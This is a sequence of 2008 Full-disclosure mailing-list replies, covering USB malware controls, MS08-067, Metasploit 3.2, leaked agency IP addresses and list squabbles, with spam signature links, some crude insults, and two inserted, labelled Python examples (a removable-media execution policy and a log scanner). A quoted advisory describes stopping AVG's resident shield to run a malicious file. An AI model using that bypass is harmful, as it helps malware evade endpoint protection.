they decided to fix it now; however, it wasn't worth it to put a bunch of guys
on it.

On Tue, Nov 25, 2008 at 8:20 PM, Paul Schmehl [EMAIL PROTECTED] wrote:

 --On Tuesday, November 25, 2008 06:48:34 -0600 James Matthews 
 [EMAIL PROTECTED] wrote:


 I think in that effect they didn't feel they had to put the resources in to
 fix it because it wasn't worth the money.


 That's a pretty ridiculous statement considering that they *did* put the
 resources into fixing it.

 --
 Paul Schmehl, Senior Infosec Analyst
 As if it wasn't already obvious, my opinions
 are my own and not those of my employer.
 ***
 Check the headers before clicking on Reply.




-- 
http://www.astorandblack.com/

http://www.jewelerslounge.com/liberty-coin-cufflinks

Re: [Full-disclosure] IRC Security Channels

2008-11-24 Thread James Matthews
Does that mean you don't want to give because you are going to go to jail or
#nologin is the channel?

On Tue, Nov 25, 2008 at 5:44 AM, [EMAIL PROTECTED] wrote:

 #nologin

 disque you have blood in your stool
 rembrandt I'm going to jail
 disque dreams come true

 On Fri, Nov 21, 2008 at 2:55 PM, Trollie Fingers
 [EMAIL PROTECTED] wrote:
  After a week of mostly chatter I think we should have a productive thread.
 
  Security related IRC Channels.
 
  Would anyone mind sharing a list?  Or collectively combining one.
 
  I'll start:
  irc.2600.net (hosts channels related to 2600 magazine.)





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/luxury-watch-safe

Re: [Full-disclosure] Fwd: Comment on: 2 engineers from China sentenced for espionage

2008-11-23 Thread James Matthews
We are seeing a disturbing amount of cyber attacks coming from China.

On Sun, Nov 23, 2008 at 5:54 PM, Mike C [EMAIL PROTECTED] wrote:



 On Sun, Nov 23, 2008 at 4:16 AM, n3td3v [EMAIL PROTECTED] wrote:

 -- Forwarded message --
 From: n3td3v [EMAIL PROTECTED]
 Date: Sat, Nov 22, 2008 at 10:33 PM
 Subject: Comment on: 2 engineers from China sentenced for espionage
 To: n3td3v [EMAIL PROTECTED]


 by n3td3v November 22, 2008 2:28 PM PST

 marcus sachs is doing a good job at keeping cyber security in the news
 to influence the next administration as it is coming in and 100 days
 after. http://youtube.com/watch?v=FSUPTZVlkyU


 http://news.cnet.com/8618-1001_3-10106100.html?communityId=2105targetCommunityId=2105blogId=92messageId=5045335tag=mncol;tback


 Hi n3td3v,

 Thanks for the update. Going by the recent history, I can see that there
 will be some comments deriding your posting, but there are those in the
 silent majority who appreciate the posts.

 --
 MC






-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/luxury-insurance

Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses

2008-11-23 Thread James Matthews
Bit9 and Kaspersky offer this new service. Companies should make use of it.

On Sun, Nov 23, 2008 at 10:05 PM, Bipin Gautam [EMAIL PROTECTED] wrote:

 On 11/23/08, Mike C [EMAIL PROTECTED] wrote:

  Of course, blindly thwacking people / dragging them to HR by the hair
  when they're really just trying to do their jobs is
  counter-productive. The calls also show us where we, security, are
  falling down. Perhaps it's poor awareness training (if the user didn't
  know that they shouldn't run unapproved software, or why we have that
  rule, or how to get a new app approved); or could be that the official
  route is being seen as too slow or bureaucratic, in which case it
  needs fixing. And so on.
 
 
  All I hope is we can fix the issue. Hopefully in the near future.
 


 Yeah!
 Here is my perspective on a possible solution that wouldn't compromise
 usability.

 But, first let's all agree that banning execution of any binary from
 removable media is the only straightforward solution to this decades-old
 problem of virus infection/propagation from removable media.

 See, if a web-page tries to install an activeX / browser plugin, your
 browser (non intrusively) waits for user interaction with a security
 warning message on if you really intend to install the plugin (Which
 may be harmful!) or ...may choose to ignore the dialog and
 continue browsing.

 Here, it is assumed user understands the security impact of
 executing untrusted programs from internet and let the execution
 decision left to the end user with manual interaction. If the plugin
 installation behavior is not intended user can simply ignore the
 manual interaction request for execution and instead continue.

 In a similar way, an anti virus company or Microsoft should create something
 similar for the My Computer Zone, where the first execution of a binary from
 removable media is denied by default and prompts for user interaction
 to execute, white list & execute or terminate/ban the request for
 execution from removable media, the way Internet Explorer (non
 intrusively) handles installation of ActiveX. Binary
 execution from removable media should be treated that way (untrusted!)

 Pen drive / SD have unique serial numbers which can be used to
 identify and permanently whitelist or blacklist the media from
 execution.

 Windows already has a feature for prompting if user tries to execute
 binary from intranet/shared folder or execution of binary marked as
 downloaded from Internet Zone

 Why not have similar for binary execution from removable media as well!?

 What better could be the solution to stopping virus to propagate from
 removable medias with (default) FAT file system. (lacking ACL's)

 For corporate environment let there be feature to sync these white
 listed/blacklisted hashes of executable or removable media UID from
 anti virus server/domain controller to anti virus clients/related
 service running in user end.

 Will this work :)?

 -thanks,
 bipin





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/luxury-insurance

Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses

2008-11-23 Thread James Matthews
What I was referring to was having only programs on a corporate white list
run. White listing services are provided by http://www.bit9.com/ and they
have now partnered with Kaspersky to be able to ID most programs and run
anything else in a sandbox.

However, your approach to blocking USB devices is better. But this is an
overall approach.

James

On Mon, Nov 24, 2008 at 7:17 AM, Bipin Gautam [EMAIL PROTECTED] wrote:

 On 11/24/08, James Matthews [EMAIL PROTECTED] wrote:
  Bit9 and Kaspersky offer this new service. Companies should make use of it.
 

 what service, James!

 Could you please explain more...

 I find it ridiculous to know that this problem has been there since the
 earliest version of Windows but still without a generic solution! Is
 this unwillingness to approach a proper solution what has
 fueled the antivirus business for so long?

 If you look in the *nix side you will see this technique is
 tested/proven. Signature based or behavior based approach detection
 will continue to fail.

 To address this never-ending problem of virus infection from removable
 media, I have implemented no-execution-from-removable on dozens of
 computers in the past years; even the dumbest of users understand what
 is being done and feel safe that they won't likely have a virus
 infection from the removable media ever, even if the media has a
 virus. They know the workaround for temporarily disabling the
 restriction if they are willing to run something trustworthy, as I have
 made clear to the users that there is no solution to the problem of virus
 infection from removable media and you have to learn these few
 things ...like you have learned to use antivirus software to stay
 safe. Users get it, really!

 Antivirus companies should take similar approach (as described
 previously) to address it but adding USABILITY.

 This problem is there to stay for years to come. What better could be
 the proper solution to this problem?

 thanks,
 -bipin



  On Sun, Nov 23, 2008 at 10:05 PM, Bipin Gautam
  [EMAIL PROTECTED]wrote:
 
  On 11/23/08, Mike C [EMAIL PROTECTED] wrote:
 
   Of course, blindly thwacking people / dragging them to HR by the hair
   when they're really just trying to do their jobs is
   counter-productive. The calls also show us where we, security, are
   falling down. Perhaps it's poor awareness training (if the user didn't
   know that they shouldn't run unapproved software, or why we have that
   rule, or how to get a new app approved); or could be that the official
   route is being seen as too slow or bureaucratic, in which case it
   needs fixing. And so on.
  
  
   All I hope is we can fix the issue. Hopefully in the near future.
  
 
 
  Yeah!
  Here is my perspective on a possible solution that wouldn't compromise
  usability.
 
  But, first let's all agree that banning execution of any binary from
  removable media is the only straightforward solution to this decades-old
  problem of virus infection/propagation from removable media.
 
  See, if a web-page tries to install an activeX / browser plugin, your
  browser (non intrusively) waits for user interaction with a security
  warning message on if you really intend to install the plugin (Which
  may be harmful!) or ...may choose to ignore the dialog and
  continue browsing.
 
  Here, it is assumed user understands the security impact of
  executing untrusted programs from internet and let the execution
  decision left to the end user with manual interaction. If the plugin
  installation behavior is not intended user can simply ignore the
  manual interaction request for execution and instead continue.
 
  In a similar way, an anti virus company or Microsoft should create something
  similar for the My Computer Zone, where the first execution of a binary from
  removable media is denied by default and prompts for user interaction
  to execute, white list & execute or terminate/ban the request for
  execution from removable media, the way Internet Explorer (non
  intrusively) handles installation of ActiveX. Binary
  execution from removable media should be treated that way (untrusted!)
 
  Pen drive / SD have unique serial numbers which can be used to
  identify and permanently whitelist or blacklist the media from
  execution.
 
  Windows already has a feature for prompting if user tries to execute
  binary from intranet/shared folder or execution of binary marked as
  downloaded from Internet Zone
 
  Why not have similar for binary execution from removable media as well!?
 
  What better could be the solution to stopping virus to propagate from
  removable medias with (default) FAT file system. (lacking ACL's)
 
  For corporate environment let there be feature to sync these white
  listed/blacklisted hashes of executable or removable media UID from
  anti virus server/domain controller to anti virus clients/related
  service running in user end.
 
  Will this work :)?
 
  -thanks,
  bipin
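
The deny-by-default scheme proposed in the quoted message above (prompt on first execution from removable media, white/black lists keyed on media serial and on executable hash, lists synced from a central server) can be written as a small decision engine. This is an added example, not code from the thread; the class and method names, the use of SHA-256, and the serials and file contents are assumptions constructed for illustration.

```python
import hashlib
from dataclasses import dataclass, field
from enum import Enum


class Verdict(Enum):
    ALLOW = "allow"
    DENY = "deny"
    PROMPT = "prompt"   # execution stays blocked until the user answers


class Choice(Enum):
    EXECUTE_ONCE = "execute"
    WHITELIST_AND_EXECUTE = "white list & execute"
    BAN = "terminate/ban"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class RemovableMediaPolicy:
    allowed_media: set = field(default_factory=set)    # trusted media serials
    banned_media: set = field(default_factory=set)
    allowed_hashes: set = field(default_factory=set)   # trusted executable hashes
    banned_hashes: set = field(default_factory=set)

    def check(self, media_serial: str, binary: bytes) -> Verdict:
        """Decide what happens when a binary on removable media is launched."""
        digest = sha256_hex(binary)
        # Bans are evaluated first: the serial is reported by the device
        # itself, so a trusted stick must not be able to launch a banned file.
        if digest in self.banned_hashes or media_serial in self.banned_media:
            return Verdict.DENY
        if digest in self.allowed_hashes or media_serial in self.allowed_media:
            return Verdict.ALLOW
        return Verdict.PROMPT   # unknown binary on unknown media: deny by default

    def answer_prompt(self, binary: bytes, choice: Choice) -> bool:
        """Record the user's answer; return True if the binary may run now."""
        digest = sha256_hex(binary)
        if choice is Choice.WHITELIST_AND_EXECUTE:
            self.allowed_hashes.add(digest)
            return True
        if choice is Choice.BAN:
            self.banned_hashes.add(digest)
            self.allowed_hashes.discard(digest)
            return False
        return choice is Choice.EXECUTE_ONCE   # run once, remember nothing

    def sync_from_server(self, server: "RemovableMediaPolicy") -> None:
        """Merge the corporate lists; a central ban overrides a local allow."""
        self.banned_hashes |= server.banned_hashes
        self.banned_media |= server.banned_media
        self.allowed_hashes = (self.allowed_hashes | server.allowed_hashes) - self.banned_hashes
        self.allowed_media = (self.allowed_media | server.allowed_media) - self.banned_media


def demo():
    """Walk constructed samples through the policy and return the verdicts."""
    client = RemovableMediaPolicy()
    tool = b"constructed sample: admin tool"
    worm = b"constructed sample: autorun worm"
    usb_a, usb_b = "SERIAL-A-0001", "SERIAL-B-0002"   # constructed serials

    verdicts = [client.check(usb_a, tool)]              # first sight: PROMPT
    client.answer_prompt(tool, Choice.WHITELIST_AND_EXECUTE)
    verdicts.append(client.check(usb_b, tool))          # same file, other stick
    verdicts.append(client.check(usb_a, worm))          # unknown: PROMPT

    server = RemovableMediaPolicy(allowed_media={usb_a},
                                  banned_hashes={sha256_hex(worm)})
    client.sync_from_server(server)
    verdicts.append(client.check(usb_a, worm))          # hash ban beats trusted media
    verdicts.append(client.check(usb_a, b"constructed sample: new file"))
    return verdicts


if __name__ == "__main__":
    for verdict in demo():
        print(verdict.value)
```
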

Re: [Full-disclosure] New hackers defacing the internets

2008-11-18 Thread James Matthews
Aww, I was hoping for a new face on the block.

On Tue, Nov 18, 2008 at 10:10 PM, [EMAIL PROTECTED] wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Dear Fred,

 Valdis' mustache and I have been following this group of hackers
 for a long time.  As proof I offer a md5 hash[1] and url[2].

 Thanks for your time,
 - -al

 [1] abcdefghijklmnopqrstuvwxyz
 [2] http://www.zone-h.net/defaced/2007/03/05/www.or-brun.com/

 On Tue, 18 Nov 2008 14:34:33 -0500 Fredrick Diggle
 [EMAIL PROTECTED] wrote:
 Fredrick Diggle has recently noted an upswelling of defacement on the
 internet and believes it is worth noting. Most notably Matasano
 Security has apparently been owned and their popular internet blog
 replaced with a defacement page.
 
 http://www.matasano.com/log/
 
 The group goes by a number of names including 404, 404 Bandits,
 404 Not Found, and simply Not found. This is believed to be linked
 to terrorism and possibly communism. Other recent defacements of note
 include the following.
 
 http://www.google.com/404bandits
 http://www.foxnews.com/404
 http://icanhascheezburger.com/notfoundbandits
 
 This could be the beginning of something bigger. If you notice
 anything suspicious please contact your local law enforcement agents.
 
 YAY! from Brazilia
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/luxury-insurance

Re: [Full-disclosure] Speculation over back door in Skype

2008-11-18 Thread James Matthews
That would be boring and we like to have fun on FD

On Tue, Nov 18, 2008 at 6:02 PM, [EMAIL PROTECTED] wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Dear Phil,

 Wouldn't English have been a better language for him to use than
 telepathy?

 On Tue, 18 Nov 2008 08:58:22 -0500 Phil Frederick
 [EMAIL PROTECTED] wrote:
 Uh, the date is at the top of the linked article.  I think he's trying
 to say this is old news. Which it is.
 
 On Mon, Nov 17, 2008 at 2:39 PM,  [EMAIL PROTECTED]
 wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Dearest Juha-Matti Laurio,
 
  Could you please point the community to your blog entry detailing
  the release date of this article?
 
  Thank-you for your service!
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/luxury-insurance

Re: [Full-disclosure] Fredrick Diggle has invited you to open a Google mail account

2008-11-18 Thread James Matthews
Wow free Gmail! I am signing up 10 times!

On Wed, Nov 19, 2008 at 7:50 AM, rholgstad [EMAIL PROTECTED] wrote:

 yes a new gmail account is born every minute and I would like to claim
 another

 Salvador III Manaois wrote:
  is this one of those there's one born every minute kind of email? =)
 
  ...badz...
  bytes  badz: http://badzmanaois.blogspot.com
 
 





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] IP-Adresses of German Secret Intelligence Agency supposedly leaked

2008-11-14 Thread James Matthews
HAHAHAH Now they are going to be pissed. They pass all these stupid
surveillance laws and get away with it! Let them have fun now...

On Fri, Nov 14, 2008 at 7:30 AM, niclas [EMAIL PROTECTED] wrote:

 Don't know, if this is the right place for this kind of information. I
 also believe it's no big deal but you might want to scan your server
 logs for these addresses to see who's watching you.


 https://secure.wikileaks.org/wiki/T-Systems_BND_network_assignments%2C_13_Nov_2008

 The PDF contains a list of IP addresses which seem to be used by the
 German Bundesnachrichtendienst.

 Changes to German Wikipedia pages committed by those addresses are
 listed here (German text):


 http://blog.datenritter.de/archives/393-angebliche-IP-Adressen-des-BND-und-Wikipedia-AEnderungen.html
 http://bastards22.vs8807.vserver4free.de/?p=170

 German blogger Fefe knew about (some of) these addresses in 2005 already
 and noticed visits to his site. They were looking for cold fusion at
 home (kalte fusion zuhause) and muslim world outreach.

 http://blog.fefe.de/?ts=bc15908d

 n.






-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/
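
The log check suggested in the quoted post (scan your server logs for addresses from a published list), as an added example that is not part of the thread. It assumes Common Log Format access logs; the networks below are constructed from the RFC 5737 and RFC 3849 documentation ranges, not taken from the leaked list, and the log lines are constructed as well.

```python
import ipaddress
import re
from collections import defaultdict

# Common Log Format: client, ident, user, [timestamp], "request", status, bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+')

# Constructed watch list: one address or CIDR block per line, '#' starts a comment.
SAMPLE_NETWORKS = [
    "192.0.2.0/24        # constructed entry",
    "198.51.100.64/26",
    "2001:db8:1::/48",
    "",
]

# Constructed log lines.
SAMPLE_LOG = [
    '192.0.2.17 - - [14/Nov/2008:07:01:12 +0100] "GET /blog/ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Nov/2008:07:02:40 +0100] "GET / HTTP/1.1" 200 1043',
    '198.51.100.70 - - [14/Nov/2008:07:05:03 +0100] "GET /search?q=test HTTP/1.1" 200 811',
    '198.51.100.130 - - [14/Nov/2008:07:06:11 +0100] "GET / HTTP/1.1" 200 1043',
    '2001:db8:1:2::5 - - [14/Nov/2008:07:09:30 +0100] "GET /feed HTTP/1.1" 304 0',
    'crawler.example.net - - [14/Nov/2008:07:10:00 +0100] "GET /robots.txt HTTP/1.1" 404 0',
    'garbage line',
]


def load_networks(lines):
    """Parse the watch list into ip_network objects, ignoring blanks and comments."""
    networks = []
    for raw in lines:
        entry = raw.split("#", 1)[0].strip()
        if entry:
            # strict=False accepts entries whose host bits are set (e.g. 192.0.2.17/24)
            networks.append(ipaddress.ip_network(entry, strict=False))
    return networks


def scan(log_lines, networks):
    """Return ({network: [(client, timestamp, request), ...]}, skipped_line_count)."""
    hits = defaultdict(list)
    skipped = 0
    for line in log_lines:
        match = CLF.match(line)
        if not match:
            skipped += 1            # not a CLF line
            continue
        try:
            client = ipaddress.ip_address(match.group(1))
        except ValueError:
            skipped += 1            # server logged a resolved hostname, not an address
            continue
        for net in networks:
            if client.version == net.version and client in net:
                hits[str(net)].append((str(client), match.group(2), match.group(3)))
    return dict(hits), skipped


if __name__ == "__main__":
    found, skipped = scan(SAMPLE_LOG, load_networks(SAMPLE_NETWORKS))
    for net, entries in sorted(found.items()):
        for client, when, request in entries:
            print(f"{net}\t{client}\t{when}\t{request}")
    print(f"skipped {skipped} unparsable line(s)")
```

Lines with a hostname in the client field are counted as skipped rather than matched; if the server does reverse lookups when logging, turn that off or resolve the names before scanning.
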

Re: [Full-disclosure] Malicious Code time-line 1980-2008

2008-11-14 Thread James Matthews
Wikipedia, virus.org

On Thu, Nov 13, 2008 at 9:58 PM, David Omorogbe [EMAIL PROTECTED] wrote:

  Hi All,
 I am writing a research paper on malicious code time-line
 1980-2008. The paper is about malicious code history, but I want to know if
 anyone knows any resource that I can use.

 Regards





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Attorneys for Palin email hacker: 'Don't call him hacker'

2008-11-13 Thread James Matthews
He should be called Wikipedia reader!

On Thu, Nov 13, 2008 at 10:26 PM, Trollie Fingers [EMAIL PROTECTED] wrote:

 Very interesting:

 *The terms hacker and hacking have no basis under the statute Kernell
 is accused of violating, a motion filed in US District Court in Knoxville
 argues. It goes on to seek an order forbidding prosecutors and their
 witnesses from using those words when referring to the case.*

 *Because of the negative connotations evoked by these terms, there is a
 significant danger of unfair prejudice, confusion of the issues, and
 misleading the jury, the motion states. Hackers are commonly portrayed as
 dangerous criminals who are involved in malicious conduct such as credit
 card fraud, stealing, intentional disruption of legitimate activities and
 causing economic damages.*
 Full article:
 http://www.theregister.co.uk/2008/11/13/palin_email_hacker_motions/







-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] [Cross Post] [Job Interview Guidance Request] Computer Forensics Officer

2008-11-11 Thread James Matthews
If you know the industry then you will be able to answer the questions.

On Tue, Nov 11, 2008 at 9:58 AM, Aaron S. [EMAIL PROTECTED] wrote:

 Hi,

 I have an interview with a government agency for the post of Computer
 Forensics Officer. Has anybody had experience interviewing for a
 similar position? I would highly appreciate if anybody could give me
 an idea about what to expect in the interview.

 I have read through the forensic wiki and electronic evidence
 information center sites and other resources on the Internet. I just
 need some idea of what to expect in the interview.

 Thanks in advance.

 Aaron.





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] question

2008-11-10 Thread James Matthews
The usual here these days.

On Mon, Nov 10, 2008 at 12:54 AM, vulcanius [EMAIL PROTECTED] wrote:

 This is absolutely full of irony.


 On Sun, Nov 9, 2008 at 5:20 PM, n3td3v [EMAIL PROTECTED] wrote:

 are you one of those weirdos who tries to speak on behalf of an email
 list and when a question is emailed to you, you don't answer it and
 instead attempt to get the list to answer it on your behalf that you
 think you're representing the opinion of?

 On Sun, Nov 9, 2008 at 9:58 PM, waveroad waveroad [EMAIL PROTECTED]
 wrote:
  Ask this question to your psy.
 
 
 
  2008/11/9, n3td3v [EMAIL PROTECTED]:
 
  what is your problem with me?
 
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday

2008-11-07 Thread James Matthews
I love waking up in the morning to read this! Ahh

On Fri, Nov 7, 2008 at 10:39 AM, Anders Klixbull [EMAIL PROTECTED] wrote:

 The hardcore cockgobbler scene of scotland

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Elazar
 Broad
 Sent: 7. november 2008 07:34
 To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
 Subject: Re: [Full-disclosure] Two bulletins from Microsoft on Patch
 Tuesday

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 What scene...

 On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v [EMAIL PROTECTED] wrote:
 i've been monitoring the scene since 1999 so what do you mean no
 experience? i make that about 10 years experience if my math is
 correct.
 
 On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee [EMAIL PROTECTED] wrote:
  Do you even understand why people don't like you? It is because you have all
  these crackpot ideas but no experience to back it up. All your ideas only
  make sense from a theoretical standpoint, but in practicality most will
  fail.
 
  On Fri, Nov 7, 2008 at 11:31 AM, n3td3v [EMAIL PROTECTED] wrote:
 
  blackhats like you will always hate on me, so i just ignore the
  negative responses i get.
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?

2008-11-07 Thread James Matthews
OT I really like the name you put up. Gmail asked me if I wanted to Invite
some guy posting to full disclosure to chat

On Mon, Nov 3, 2008 at 11:51 PM, Some Guy Posting To Full Disclosure 
[EMAIL PROTECTED] wrote:

 It's futile trying to use the law to change things.
 It will simply force people into the shadows. Which today involves
 using tor and some Russian web money account.

 I read a slogan from before my time, in a book: If source is outlawed
 outlaws will have source - same applies to zero days.

 Anyway I don't think it should be Illegal. I own a set of lock picks -
 I don't intend to break into someone's house. And if I did I'd go to
 jail (for the burglary and being equipped with picks), until then I'm
 innocent. The UK's law has an attitude like that - I like it!
 Resources should go into actually preventing crimes taking place. Not
 stumbling around hoping that making it awkward for criminals to get
 the tools they need will make a difference.

 Simon.





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Death of a Gay h4x0r!

2008-11-06 Thread James Matthews
He isn't so bad, have some mercy ;)

On 11/6/08, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik Højgaard said:

 And now he accidentally the entire fleshlight!

 This sentence no verb.



-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/



Re: [Full-disclosure] Odays offers

2008-11-05 Thread James Matthews
Test them against google and see if they work?

On Tue, Nov 4, 2008 at 11:54 PM, John Allison [EMAIL PROTECTED] wrote:

  Why would a Whitehat want zone-h shutdown?  That makes no sense at all.

  Date: Tue, 4 Nov 2008 13:57:56 +
  From: [EMAIL PROTECTED]
  To: full-disclosure@lists.grok.org.uk
  Subject: Re: [Full-disclosure] Odays offers
 
  now maybe he should shut down his zone-h site as well and keep
  whitehats happy :)
 
  On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois
  [EMAIL PROTECTED] wrote:
   sell 'em at wabisabilabi.
  
   ops, too late:
  
   http://www.techworld.com/security/news/index.cfm?newsID=106294
  
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] AVG 8.0.173 flaw

2008-11-05 Thread James Matthews
For all people that use the free AVG you get what you paid for for all
else

On Wed, Nov 5, 2008 at 6:05 PM, Erik Harrison [EMAIL PROTECTED] wrote:

 leveraging the same access credentials and attack vector, an attacker
 could shut down the affected system without authorization.

 oh shit. time to patch!

 On Wed, Nov 5, 2008 at 10:49 AM, alessandro telami
 [EMAIL PROTECTED] wrote:
  What sort of vulnerability would this be???
 
  Date: Wed, 5 Nov 2008 08:52:28 +
  From: [EMAIL PROTECTED]
  To: full-disclosure@lists.grok.org.uk
  Subject: [Full-disclosure] AVG 8.0.173 flaw
 
  AVG 8.0.173 flaw
  Nov 5, 2008
 
  -- Affected Vendors:
  AVG Technologies
 
  -- Affected Products:
  AVG 8.0.173
 
  -- Vulnerability Details:
  There is a flaw in AVG 8.0 that allows a user to shutdown the AVG
  Resident Shield Service via Task Manager temporarily and execute a
  malicious file while the AVG Resident Shield Service is restarting.
 
  Note: The AVG Resident Shield Service can be crashed, until next boot.
 
  -- Difficulty Level:
  low
 
  -- Vendor Response:
  None
 
  -- Disclosure Timeline:
  2008-11-05 - Disclosure
 
  -- About:
  Fabio Pinheiro at http://dicas3000.blogspot.com
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Windows RPC MS08-067 FAQ document released

2008-10-25 Thread James Matthews
Try running a BinDiff and seeing what was changed.

On Sat, Oct 25, 2008 at 10:50 PM, rholgstad [EMAIL PROTECTED] wrote:

 does securiteam do anything technical or just summarize crap from all
 over the web?

 also nice generic language about 'code execution', seeing how no one on
 your team can exploit or research it themselves

 Juha-Matti Laurio wrote:
  I have posted Frequently Asked Questions document about the Windows RPC,
  i.e. Server service vulnerability MS08-067.
 
  The document entitled as Microsoft Windows RPC Vulnerability MS08-067
  (CVE-2008-4250) FAQ - October 2008 can be found at
  http://blogs.securiteam.com/index.php/archives/1150
 
  The document describes Trojans related to this issue too.
 
  Juha-Matti
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Time to patch Windows boxes with MS08-067

2008-10-23 Thread James Matthews
We are still waiting to hear more about this vulnerability. I guess the
BinDiff will come out soon.

On Thu, Oct 23, 2008 at 5:12 PM, Juha-Matti Laurio 
[EMAIL PROTECTED] wrote:

 The out-of-cycle update from Microsoft is MS08-067 - Vulnerability in
 Server Service Could Allow Remote Code Execution:

 http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

 Recommended workarounds:
 -Disable the Server and Computer Browser services
 -Block TCP ports 139 and 445 at the firewall

 As reported in Tuesday's advance notification all major Windows versions
 are affected, the bulletin rates Vista update as Important.

 Microsoft has updated their AV products to protect against this RPC issue
 too.

 Juha-Matti





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Fwd: UK government monitoring

2008-10-13 Thread James Matthews
I think the irony of the situation is that they have had their CCTV cameras for
years now and they didn't bring crime down. How will this database help?

On Sun, Oct 12, 2008 at 8:35 PM, n3td3v [EMAIL PROTECTED] wrote:

 On 10 Oct, 11:56, Robin Wood [EMAIL PROTECTED] wrote:
  Looks like the UK government is going to start monitoring us a lot
  closer in the future:
 http://www.theregister.co.uk/2008/10/07/detica_interception_modernisation/

 they are already doing it, you just don't know about it yet, oh you do
 now...because they want to start using the data for court cases, so
 the announcement has been made.

 if the government announce something, it usually means, we've tested
 this out already and it kicks ass, and now we want to make it official
 and no longer a secret, as we need to admit to a judge how we came to
 have certain evidence in order to convict people we want to take out
 the picture, either because they are an immediate risk to national
 security or are getting in the way of MI5/6/GCHQ strategic ambitions.

 if public opinion says no to the database, the database won't be taken
 away, it will still be there as an open secret.

 the only problem that arises is the data held would still only be able
 to be used by intelligence officers to coordinate operations, but
 couldn't be used to convict anybody.

 what's going on right now is, they want to use this database to
 convict people, so they had to make the announcement, however the
 database has always been there, and even if the public don't give it
 the go-ahead, even if it doesn't exist yet, they would just build it
 in secret anyway...

 however n3td3v believes the database is already in place.

 This news release is just a public acceptability test, for a database
 which is already in existence.

 n3td3v





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Metasploit 3.2 Offers More 'Evil Deeds'

2008-10-09 Thread James Matthews
I think it's a nice tool, enabling people who cannot afford the more
expensive ones (Core Impact or Immunity CANVAS) to still have a nice stable
framework.

On Thu, Oct 9, 2008 at 6:38 PM, H D Moore [EMAIL PROTECTED] wrote:

 You can find our SecTOR presentation online at:
  http://metasploit.com/research/conferences/

 Grab an early of 3.2 (testing) from SVN:
  $ svn co http://metasploit.com/svn/framework3/trunk/ msf32/

 A little bit about the new licensing (much more to follow):
  http://www.darkreading.com/document.asp?doc_id=165636WT.svl=news1_1

 Metasploit is now officially an open-source project with a mostly-new
 group of developers behind it. We are still a week or two away from the
 final release, so keep an eye out for more information about the new
 features and improvements on the metasploit blog:
  http://metasploit.com/blog

 -HD

 PS. The Evil Deeds article is mostly correct, but some of the specific
 items were mangled in translation. The new EXE template does not allow
 you to turn a metasploit exploit into an EXE, it lets you take a
 metasploit payload+encoder into an EXE, big difference :-)

 On Thursday 09 October 2008, Ivan . wrote:
  Metasploit 3.2 looks like it rocks!






-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] n3td3v group members important notice

2008-10-08 Thread James Matthews
Whoo dodged another one!

On Tue, Oct 7, 2008 at 8:41 PM, Ed Carp [EMAIL PROTECTED] wrote:

 On Tue, Oct 7, 2008 at 8:24 PM, n3td3v [EMAIL PROTECTED] wrote:

  I'm sorry to those reading the archive on the web and those who were
  reading the group via RSS / Atom news readers, but in light of recent
  events, n3td3v is in lockdown and will not be reopening to
  non-registered users for the foreseeable future until I'm sure the
  threat has passed by.

 Target the lead vessel, Mr. Worf ... full spread ... FIRE!

 ;)





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Fwd: cnn.com - Homeland Security seeks cyber counterattack system(Einstein 3.0)

2008-10-07 Thread James Matthews
The US government can't ever get their act together. It's just a waste of
time.

On Mon, Oct 6, 2008 at 1:09 PM, Buhrmaster, Gary [EMAIL PROTECTED] wrote:


  Which is easier to shut down, an attack coming from a relatively small
  number of /16s that belong to the government, or one coming from the
  same number of source nodes scattered *all* over Comcast and Verizon
  and BT and a few other major providers?
 
  Hint 1: Consider the number of entry points into your network
  for the two cases, especially if you are heavily peered with one or more
  of the source ISPs.

 The Federal Government (through its Trusted Internet
 Connection initiative) is trying to limit the number
 of entry points into the US Government networks.
 (As I recall from 4000 interconnects to around 50,
 where both numbers have a high percentage of politics
 in the error bar.)





-- 
http://www.goldwatches.com/

